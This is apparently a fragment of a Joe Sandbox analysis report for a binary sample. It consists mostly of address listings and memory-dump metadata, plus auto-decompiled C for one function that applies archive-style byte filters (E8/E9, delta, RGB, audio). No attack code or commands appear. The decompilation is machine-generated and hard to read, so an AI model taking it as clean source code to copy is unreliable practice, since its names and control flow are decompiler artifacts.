                                                        0x00a16eea
                                                        0x00a16ed6
                                                        0x00a16ed6
                                                        0x00a16ed6
                                                        0x00a16eec
                                                        0x00a16eef
                                                        0x00a16ef3
                                                        0x00a16ef5
                                                        0x00a16ef9
                                                        0x00a16f00
                                                        0x00a16f0a
                                                        0x00a16f0c
                                                        0x00a16f15
                                                        0x00a16f17
                                                        0x00a16f17
                                                        0x00a16f1a
                                                        0x00a16f1a
                                                        0x00a16f1f
                                                        0x00a16f26
                                                        0x00a16f2c
                                                        0x00a16f32
                                                        0x00a16f39
                                                        0x00a16f66
                                                        0x00a16f67
                                                        0x00a16f68
                                                        0x00a16f6a
                                                        0x00a16f86
                                                        0x00a16f89
                                                        0x00a16f90
                                                        0x00a16f93
                                                        0x00a16f96
                                                        0x00a16fa1
                                                        0x00a16fad
                                                        0x00a16faf
                                                        0x00a16fb5
                                                        0x00a16fb7
                                                        0x00a16fb7
                                                        0x00a16fb9
                                                        0x00000000
                                                        0x00a16fb9
                                                        0x00a16f72
                                                        0x00a16f75
                                                        0x00a16f75
                                                        0x00a16f77
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16f79
                                                        0x00a16f7a
                                                        0x00a16f7d
                                                        0x00a16f80
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16f82
                                                        0x00a16f84
                                                        0x00000000
                                                        0x00a16f3b
                                                        0x00a16f3d
                                                        0x00a16f40
                                                        0x00a16f4a
                                                        0x00a16f52
                                                        0x00a16f57
                                                        0x00a16f5a
                                                        0x00a16fc1
                                                        0x00a16fc1
                                                        0x00a16fc4
                                                        0x00a16fc7
                                                        0x00a16fd7
                                                        0x00a16fda
                                                        0x00a16fda
                                                        0x00a16fc9
                                                        0x00a16fc9
                                                        0x00a16fc9
                                                        0x00a16fdc
                                                        0x00a16fdd
                                                        0x00a16fe1
                                                        0x00a16fe3
                                                        0x00a16fe5
                                                        0x00a170f3
                                                        0x00a170f3
                                                        0x00a170f9
                                                        0x00a170ff
                                                        0x00a17100
                                                        0x00a17104
                                                        0x00a1710a
                                                        0x00a1710c
                                                        0x00a1710d
                                                        0x00a17111
                                                        0x00a17117
                                                        0x00a17119
                                                        0x00a17119
                                                        0x00a1711a
                                                        0x00a1711a
                                                        0x00a17117
                                                        0x00a1710a
                                                        0x00a1711e
                                                        0x00a17126
                                                        0x00a1712c
                                                        0x00a17130
                                                        0x00000000
                                                        0x00a16feb
                                                        0x00a16feb
                                                        0x00a16fee
                                                        0x00a170cf
                                                        0x00a170d8
                                                        0x00a170e0
                                                        0x00a170e4
                                                        0x00a170eb
                                                        0x00a170ed
                                                        0x00a170ed
                                                        0x00a170f0
                                                        0x00000000
                                                        0x00a170f0
                                                        0x00a16ff4
                                                        0x00a16ff8
                                                        0x00a17001
                                                        0x00a1700f
                                                        0x00a17013
                                                        0x00a1701a
                                                        0x00a1701c
                                                        0x00a1701c
                                                        0x00a1701f
                                                        0x00a1701f
                                                        0x00a17024
                                                        0x00a1702b
                                                        0x00a17031
                                                        0x00a17037
                                                        0x00a1703e
                                                        0x00a1706b
                                                        0x00a1706c
                                                        0x00a1706d
                                                        0x00a1706f
                                                        0x00a1708b
                                                        0x00a1708e
                                                        0x00a17095
                                                        0x00a17098
                                                        0x00a1709b
                                                        0x00a170a6
                                                        0x00a170b2
                                                        0x00a170b4
                                                        0x00a170ba
                                                        0x00a170bc
                                                        0x00a170bc
                                                        0x00a170be
                                                        0x00000000
                                                        0x00a170be
                                                        0x00a17077
                                                        0x00a1707a
                                                        0x00a1707a
                                                        0x00a1707c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1707e
                                                        0x00a1707f
                                                        0x00a17082
                                                        0x00a17085
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a17087
                                                        0x00a17089
                                                        0x00000000
                                                        0x00a17040
                                                        0x00a17042
                                                        0x00a17045
                                                        0x00a1704f
                                                        0x00a17057
                                                        0x00a1705c
                                                        0x00a1705f
                                                        0x00a170c6
                                                        0x00a170c9
                                                        0x00000000
                                                        0x00a170c9
                                                        0x00a1703e
                                                        0x00a16fe5
                                                        0x00a16f39
                                                        0x00a16e73
                                                        0x00a16e7a
                                                        0x00a16eb1
                                                        0x00a16eb1
                                                        0x00a16eb6
                                                        0x00a16eb9
                                                        0x00000000
                                                        0x00a16eb9
                                                        0x00a16e7c
                                                        0x00a16e80
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16e82
                                                        0x00a16e88
                                                        0x00a16e89
                                                        0x00a16e8c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16e8e
                                                        0x00a16e8f
                                                        0x00a16e96
                                                        0x00a16e9a
                                                        0x00a16e9a
                                                        0x00a16e9a
                                                        0x00000000
                                                        0x00a16e9a
                                                        0x00a16dea
                                                        0x00a16d3d
                                                        0x00a16d06
                                                        0x00000000
                                                        0x00a16cd1
                                                        0x00a16cd4
                                                        0x00a16cd8
                                                        0x00a16cdc
                                                        0x00a16ce0
                                                        0x00a16ce1
                                                        0x00a16ce8
                                                        0x00000000
                                                        0x00a16cea
                                                        0x00a16cea
                                                        0x00000000
                                                        0x00a16cea
                                                        0x00a16ce8

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18f5301229cc54079d512d2e05dc0e0c55ac5bccdb56f1c21631258484a6b988
                                                        • Instruction ID: 5cc123221c2d398fe3c32d6a07c3decf98629d9461b853e98112cf5152dc536f
                                                        • Opcode Fuzzy Hash: 18f5301229cc54079d512d2e05dc0e0c55ac5bccdb56f1c21631258484a6b988
                                                        • Instruction Fuzzy Hash: E312B1B16047068BC728CF28D9906F9B7E1FF58308F148A2DE597CBA81D774A8E5CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0C017 Relevance: .4, Instructions: 449COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0C017(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				char _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed char _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed char _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *((char*)(_t355 + 0x13)) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *((intOrPtr*)(_t355 + 0x13));
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x2c) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x38) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0xa3e070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x2c);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *(_t355 + 0x34) = 0;
						 *(_t355 + 0x40) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E00A0C580(_t277, _t175, 4) == 5) {
									E00A0C5CB(_t277, E00A0C580(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x3c);
								_t285 =  *(_t355 + 0x30);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x30) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x38);
						_t316 =  *(_t355 + 0x2c);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x2c) = _t316;
						 *(_t355 + 0x38) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x20) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x30) = _t289;
					 *(_t355 + 0x3c) = _t278;
					 *(_t355 + 0x44) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x2c) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x18) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x24) = 0;
						 *(_t355 + 0x14) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x20);
							_t221 =  *(_t355 + 0x3c) - _t351;
							_t352 =  *(_t355 + 0x3c);
							 *(_t355 + 0x28) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x38) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x34) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x44) = E00A25BBA(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x28) = E00A25BBA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t234 = E00A25BBA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t292 =  *((intOrPtr*)(_t355 + 0x4c));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x1c);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
										_t279 =  *(_t355 + 0x38);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x34);
										}
									} else {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
									}
								}
								_t223 =  *(_t355 + 0x2c);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x2c) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x28);
							} while ( &(_t334[ *(_t355 + 0x28)]) < _t289);
							_t351 =  *(_t355 + 0x18);
							_t218 =  *(_t355 + 0x24);
							_t319 =  *(_t355 + 0x14);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x24) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x44);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x34) = _t293;
					 *(_t355 + 0x38) = _t235;
					 *(_t355 + 0x40) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x3c) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x28) =  *(_t355 + 0x28) & 0x00000000;
							 *(_t355 + 0x24) =  *(_t355 + 0x24) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0;
							 *(_t355 + 0x24) = 0;
							E00A1F5F0(_t336, _t355 + 0x48, 0, 0x1c);
							 *(_t355 + 0x3c) =  *(_t355 + 0x3c) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x2c) = _t336;
							if(_t336 <  *(_t355 + 0x38)) {
								_t238 =  *(_t355 + 0x14);
								do {
									_t322 =  *(_t355 + 0x24);
									 *(_t355 + 0x1c) = _t322 -  *(_t355 + 0x20);
									_t297 =  *(_t355 + 0x34);
									 *(_t355 + 0x20) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x34) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x1c) * _t238 + _t345 *  *(_t355 + 0x1c) + _t353 *  *(_t355 + 0x24) +  *(_t355 + 0x28) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x2c) +  *(_t355 + 0x40)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x28) = _t304 -  *(_t355 + 0x28);
									 *(_t355 + 0x2c) = _t304;
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00A25BBA(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00A25BBA(_t323, (_t323 << 3) -  *(_t355 + 0x24));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00A25BBA(_t323,  *(_t355 + 0x28) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00A25BBA(_t323, (_t323 << 3) -  *(_t355 + 0x28));
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00A25BBA(_t323,  *(_t355 + 0x2c) + _t349);
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00A25BBA(_t323, _t349 -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x7c)) =  *((intOrPtr*)(_t355 + 0x7c)) + E00A25BBA(_t323, _t349 +  *(_t355 + 0x1c));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x30) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x18);
										_t238 =  *(_t355 + 0x14);
									} else {
										_t324 =  *(_t355 + 0x48);
										_t266 = 0;
										 *(_t355 + 0x48) =  *(_t355 + 0x48) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x48 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x48 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x48 + _t308 * 4) =  *(_t355 + 0x48 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x18);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x18) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x14) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x14);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x2c) + _t281;
									 *(_t355 + 0x30) =  *(_t355 + 0x30) + 1;
									 *(_t355 + 0x2c) = _t306;
								} while (_t306 <  *(_t355 + 0x38));
								_t336 =  *(_t355 + 0x3c);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x3c) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x2c) = _t309;
				 *(_t355 + 0x30) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x28) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x30)) {
							_t310 =  *(_t355 + 0x30);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x2c);
								_t274 =  *(_t355 + 0x28);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x2c) = _t309;
						 *(_t355 + 0x28) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}









































































                                                        0x00a0c017
                                                        0x00a0c021
                                                        0x00a0c026
                                                        0x00a0c0bd
                                                        0x00000000
                                                        0x00a0c0bd
                                                        0x00a0c02f
                                                        0x00a0c507
                                                        0x00a0c50a
                                                        0x00a0c50c
                                                        0x00a0c50f
                                                        0x00a0c518
                                                        0x00a0c579
                                                        0x00000000
                                                        0x00a0c579
                                                        0x00a0c520
                                                        0x00a0c522
                                                        0x00a0c524
                                                        0x00a0c52a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c530
                                                        0x00a0c530
                                                        0x00a0c530
                                                        0x00a0c532
                                                        0x00a0c533
                                                        0x00a0c534
                                                        0x00a0c538
                                                        0x00a0c53e
                                                        0x00a0c542
                                                        0x00a0c555
                                                        0x00a0c55d
                                                        0x00a0c561
                                                        0x00a0c561
                                                        0x00a0c544
                                                        0x00a0c549
                                                        0x00a0c54b
                                                        0x00a0c551
                                                        0x00a0c551
                                                        0x00a0c549
                                                        0x00a0c563
                                                        0x00a0c567
                                                        0x00a0c56a
                                                        0x00a0c56d
                                                        0x00a0c56d
                                                        0x00a0c570
                                                        0x00000000
                                                        0x00a0c574
                                                        0x00a0c038
                                                        0x00a0c441
                                                        0x00a0c443
                                                        0x00a0c44c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c455
                                                        0x00a0c458
                                                        0x00a0c45e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c468
                                                        0x00a0c469
                                                        0x00a0c46d
                                                        0x00a0c473
                                                        0x00a0c476
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c478
                                                        0x00a0c480
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c482
                                                        0x00a0c486
                                                        0x00a0c488
                                                        0x00a0c48d
                                                        0x00a0c491
                                                        0x00a0c495
                                                        0x00a0c496
                                                        0x00a0c49d
                                                        0x00a0c4a1
                                                        0x00a0c4b0
                                                        0x00a0c4cb
                                                        0x00a0c4cb
                                                        0x00a0c4d0
                                                        0x00a0c4d4
                                                        0x00a0c4d4
                                                        0x00a0c4d8
                                                        0x00a0c4d9
                                                        0x00a0c4dc
                                                        0x00a0c4e0
                                                        0x00a0c4e5
                                                        0x00a0c4e9
                                                        0x00a0c4ed
                                                        0x00a0c4ed
                                                        0x00a0c4f0
                                                        0x00a0c4f1
                                                        0x00a0c4f4
                                                        0x00a0c4f8
                                                        0x00a0c4f8
                                                        0x00000000
                                                        0x00a0c502
                                                        0x00a0c041
                                                        0x00a0c2f5
                                                        0x00a0c2f8
                                                        0x00a0c2fb
                                                        0x00a0c2fe
                                                        0x00a0c302
                                                        0x00a0c305
                                                        0x00a0c30c
                                                        0x00a0c310
                                                        0x00a0c319
                                                        0x00000000
                                                        0x00a0c330
                                                        0x00a0c330
                                                        0x00a0c332
                                                        0x00a0c336
                                                        0x00a0c339
                                                        0x00a0c33d
                                                        0x00a0c341
                                                        0x00a0c343
                                                        0x00a0c347
                                                        0x00a0c34b
                                                        0x00a0c34b
                                                        0x00a0c34f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c355
                                                        0x00a0c35c
                                                        0x00a0c360
                                                        0x00a0c362
                                                        0x00a0c366
                                                        0x00a0c36a
                                                        0x00a0c36e
                                                        0x00a0c370
                                                        0x00a0c373
                                                        0x00a0c37b
                                                        0x00a0c381
                                                        0x00a0c38f
                                                        0x00a0c3a4
                                                        0x00a0c3a8
                                                        0x00a0c3ad
                                                        0x00a0c3b1
                                                        0x00a0c3b4
                                                        0x00a0c3ba
                                                        0x00a0c3ca
                                                        0x00a0c3d0
                                                        0x00a0c3d4
                                                        0x00a0c3d8
                                                        0x00a0c3da
                                                        0x00a0c3da
                                                        0x00a0c3c0
                                                        0x00a0c3c0
                                                        0x00a0c3c4
                                                        0x00a0c3c4
                                                        0x00a0c3ba
                                                        0x00a0c3de
                                                        0x00a0c3e5
                                                        0x00a0c3e8
                                                        0x00a0c3f0
                                                        0x00a0c3f3
                                                        0x00a0c3fa
                                                        0x00a0c3fa
                                                        0x00a0c404
                                                        0x00a0c408
                                                        0x00a0c40c
                                                        0x00a0c410
                                                        0x00a0c410
                                                        0x00a0c411
                                                        0x00a0c415
                                                        0x00a0c41e
                                                        0x00a0c422
                                                        0x00a0c435
                                                        0x00a0c427
                                                        0x00a0c42b
                                                        0x00a0c42e
                                                        0x00a0c432
                                                        0x00a0c432
                                                        0x00000000
                                                        0x00a0c439
                                                        0x00a0c319
                                                        0x00a0c04a
                                                        0x00a0c0c9
                                                        0x00a0c0cc
                                                        0x00a0c0ce
                                                        0x00a0c0d1
                                                        0x00a0c0d7
                                                        0x00a0c0db
                                                        0x00a0c0e4
                                                        0x00000000
                                                        0x00a0c0fe
                                                        0x00a0c0fe
                                                        0x00a0c100
                                                        0x00a0c106
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c108
                                                        0x00a0c108
                                                        0x00a0c108
                                                        0x00a0c111
                                                        0x00a0c116
                                                        0x00a0c118
                                                        0x00a0c11d
                                                        0x00a0c11f
                                                        0x00a0c124
                                                        0x00a0c12c
                                                        0x00a0c130
                                                        0x00a0c135
                                                        0x00a0c139
                                                        0x00a0c13c
                                                        0x00a0c144
                                                        0x00a0c14a
                                                        0x00a0c14e
                                                        0x00a0c14e
                                                        0x00a0c15c
                                                        0x00a0c160
                                                        0x00a0c169
                                                        0x00a0c16d
                                                        0x00a0c171
                                                        0x00a0c19a
                                                        0x00a0c19c
                                                        0x00a0c1ab
                                                        0x00a0c1af
                                                        0x00a0c1b3
                                                        0x00a0c1bc
                                                        0x00a0c1cc
                                                        0x00a0c1dc
                                                        0x00a0c1ec
                                                        0x00a0c1fc
                                                        0x00a0c20a
                                                        0x00a0c217
                                                        0x00a0c21b
                                                        0x00a0c223
                                                        0x00a0c2bf
                                                        0x00a0c2c3
                                                        0x00a0c229
                                                        0x00a0c229
                                                        0x00a0c22d
                                                        0x00a0c22f
                                                        0x00a0c235
                                                        0x00a0c236
                                                        0x00a0c23a
                                                        0x00a0c23c
                                                        0x00a0c240
                                                        0x00a0c240
                                                        0x00a0c242
                                                        0x00a0c247
                                                        0x00a0c248
                                                        0x00a0c24d
                                                        0x00a0c251
                                                        0x00a0c254
                                                        0x00a0c2b3
                                                        0x00a0c2ba
                                                        0x00a0c2bc
                                                        0x00a0c2bc
                                                        0x00000000
                                                        0x00a0c2ba
                                                        0x00a0c256
                                                        0x00a0c259
                                                        0x00a0c2a7
                                                        0x00a0c2ae
                                                        0x00a0c2b0
                                                        0x00a0c2b0
                                                        0x00000000
                                                        0x00a0c2ae
                                                        0x00a0c25b
                                                        0x00a0c25e
                                                        0x00a0c297
                                                        0x00a0c29e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c2a0
                                                        0x00a0c2a1
                                                        0x00a0c2a1
                                                        0x00000000
                                                        0x00a0c2a1
                                                        0x00a0c260
                                                        0x00a0c263
                                                        0x00a0c28b
                                                        0x00a0c292
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c294
                                                        0x00000000
                                                        0x00a0c294
                                                        0x00a0c265
                                                        0x00a0c268
                                                        0x00a0c27f
                                                        0x00a0c286
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c288
                                                        0x00a0c279
                                                        0x00a0c279
                                                        0x00000000
                                                        0x00a0c279
                                                        0x00a0c26d
                                                        0x00a0c271
                                                        0x00000000
                                                        0x00a0c278
                                                        0x00a0c278
                                                        0x00000000
                                                        0x00a0c278
                                                        0x00a0c271
                                                        0x00a0c2c7
                                                        0x00a0c2cb
                                                        0x00a0c2cd
                                                        0x00a0c2d1
                                                        0x00a0c2d5
                                                        0x00a0c2df
                                                        0x00a0c2df
                                                        0x00a0c2e3
                                                        0x00a0c2e4
                                                        0x00a0c2e8
                                                        0x00000000
                                                        0x00a0c2f0
                                                        0x00a0c0e4
                                                        0x00a0c04f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0c051
                                                        0x00a0c054
                                                        0x00a0c056
                                                        0x00a0c059
                                                        0x00a0c060
                                                        0x00a0c06a
                                                        0x00000000
                                                        0x00a0c084
                                                        0x00a0c084
                                                        0x00a0c086
                                                        0x00a0c08a
                                                        0x00a0c08a
                                                        0x00a0c08c
                                                        0x00a0c092
                                                        0x00a0c094
                                                        0x00a0c094
                                                        0x00a0c098
                                                        0x00a0c098
                                                        0x00a0c09a
                                                        0x00a0c09d
                                                        0x00a0c09e
                                                        0x00a0c0a1
                                                        0x00a0c0a5
                                                        0x00000000
                                                        0x00a0c0a7
                                                        0x00a0c0a7
                                                        0x00a0c0ab
                                                        0x00000000
                                                        0x00a0c0ab
                                                        0x00a0c0a5
                                                        0x00a0c0af
                                                        0x00a0c0af
                                                        0x00a0c0b0
                                                        0x00a0c0b3
                                                        0x00a0c0b7
                                                        0x00a0c0b7
                                                        0x00000000
                                                        0x00a0c08a

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
